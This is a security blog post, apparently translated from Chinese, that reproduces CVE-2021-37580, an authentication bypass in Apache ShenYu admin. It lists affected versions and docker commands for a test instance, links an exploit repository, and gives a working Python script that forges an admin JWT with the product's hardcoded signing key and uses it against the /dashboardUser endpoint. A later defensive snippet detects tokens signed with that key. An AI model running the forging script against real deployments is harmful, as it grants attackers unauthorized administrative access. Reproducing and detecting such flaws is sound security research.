Reproducing the Apache ShenYu JWT Authentication Flaw (CVE-2021-37580)

Author: print("") Category: Information Security Published: 2021-11-19 16:15

0x02 Affected versions

    Apache ShenYu 2.3.0

    Apache ShenYu 2.4.0

docker pull apache/shenyu-admin:2.4.0
docker run -d  -p 9095:9095  apache/shenyu-admin:2.4.0


exp:

https://github.com/Liang2580/CVE-2021-37580/

The code is as follows:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# pip install PyJWT

import requests
import re
import time
from jwt import PyJWT


def generateToken():
    headers = {
        "alg": "HS256",
        "typ": "JWT"
    }
    salt = "2095132720951327"
    exp = int(time.time())
    payload = {
        "userName": 'admin',
        "exp": exp
    }
    token = PyJWT().encode(payload=payload, key=salt,algorithm='HS256', headers=headers)
    return token


if __name__ == "__main__":
    import sys
    try:
        url=sys.argv[1]
    except IndexError:
        print("Usage: %s http://www.baidu.com" % sys.argv[0])
        exit(0)
    if isinstance(url,str):
        url1 = url + '/dashboardUser'
        headers = {
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0',
            'X-Access-Token': generateToken()
        }
        try:
            response = requests.get(url1, headers=headers, verify=False, timeout=3).json()
            print(response)
        except Exception:
            # Message reads "not vulnerable".
            print("没有该漏洞")
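
An added defensive example (not from the original post or the ShenYu project): it checks whether an X-Access-Token value taken from logs or a capture verifies under the key the PoC above signs with, which marks either a forged token or a deployment still using that key. The function names, the (source, token) record shape and the sample records are assumptions constructed for illustration.

```python
import base64
import hashlib
import hmac
import json

DEFAULT_KEY = b"2095132720951327"  # key the PoC above signs with (from the page)

def _unb64(part):
    # JWT segments are unpadded base64url; restore the padding before decoding.
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))

def _b64(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def _sign(signing_input, key):
    return hmac.new(key, signing_input.encode(), hashlib.sha256).digest()

def claims_if_signed_with(token, key=DEFAULT_KEY):
    """Return the claims when `token` is an HS256 JWT that verifies under `key`,
    else None. Expiry is ignored on purpose: a stale forged token is still a finding."""
    try:
        head, body, sig = token.strip().split(".")
        if (json.loads(_unb64(head)).get("alg") != "HS256"
                or not hmac.compare_digest(_sign(f"{head}.{body}", key), _unb64(sig))):
            return None
        claims = json.loads(_unb64(body))
        return claims if isinstance(claims, dict) else None
    except (ValueError, AttributeError):  # malformed token: not a match
        return None

def flag_requests(records, key=DEFAULT_KEY):
    """records: (source, X-Access-Token value) pairs -> [(source, userName)] hits."""
    checked = ((src, claims_if_signed_with(tok, key)) for src, tok in records)
    return [(src, c.get("userName")) for src, c in checked if c is not None]

def _fixture(key, claims):
    # Constructed test input only: an HS256 token so the check runs offline.
    head = _b64(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    signing_input = head + "." + _b64(json.dumps(claims).encode())
    return signing_input + "." + _b64(_sign(signing_input, key))

# Constructed records: documentation IPs, and a made-up non-default key.
SAMPLE = [
    ("192.0.2.10", _fixture(DEFAULT_KEY, {"userName": "admin", "exp": 1637309700})),
    ("192.0.2.11", _fixture(b"constructed-non-default-key", {"userName": "ops", "exp": 1637309700})),
    ("192.0.2.12", "not-a-jwt"),
]

if __name__ == "__main__":
    print(flag_requests(SAMPLE))
```

A hit from a source that never logged in is the signal to investigate; any hit at all means the deployment still accepts tokens under the published key.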
        
